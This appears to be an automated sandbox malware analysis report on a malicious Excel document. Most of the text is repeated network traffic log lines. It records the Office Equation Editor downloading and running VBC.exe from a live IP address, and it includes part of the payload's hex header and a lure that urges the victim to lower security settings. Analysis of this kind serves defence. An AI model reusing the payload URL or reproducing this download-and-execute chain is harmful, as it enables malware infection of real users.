Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 07:13:05 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.33Last-Modified: Tue, 29 Nov 2022 05:24:03 GMTETag: "74a68-5ee95323a363c"Accept-Ranges: bytesContent-Length: 477800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 e8 81 e9 50 86 d2 e9 50 86 d2 e9 50 86 d2 2a 5f d9 d2 eb 50 86 d2 e9 50 87 d2 4f 50 86 d2 2a 5f db d2 e6 50 86 d2 bd 73 b6 d2 e3 50 86 d2 2e 56 80 d2 e8 50 86 d2 52 69 63 68 e9 50 86 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 38 ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 2a 02 00 00 08 00 00 4a 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 04 00 00 17 86 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 e0 06 00 68 88 02 00 00 00 00 00 00 00 00 00 10 35 07 00 58 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f1 61 00 00 00 10 00 00 00 62 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 13 00 00 00 80 00 00 00 14 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 03 02 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 30 04 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 88 02 00 00 e0 06 00 00 8a 02 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /5643/VBC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.34.91Connection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035406CF

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.34.91

Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comS equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.34.91/5643/VBC.exe
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.34.91/5643/VBC.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.34.91/5643/VBC.exej
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.34.91/5643/VBC.exel
Source: vbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-ts
Source: vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035406CF

Source: global traffic

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_004054B0

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: document is protected 18 19 20 21 22 23 Open the document in If thiS document was n :' h~

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

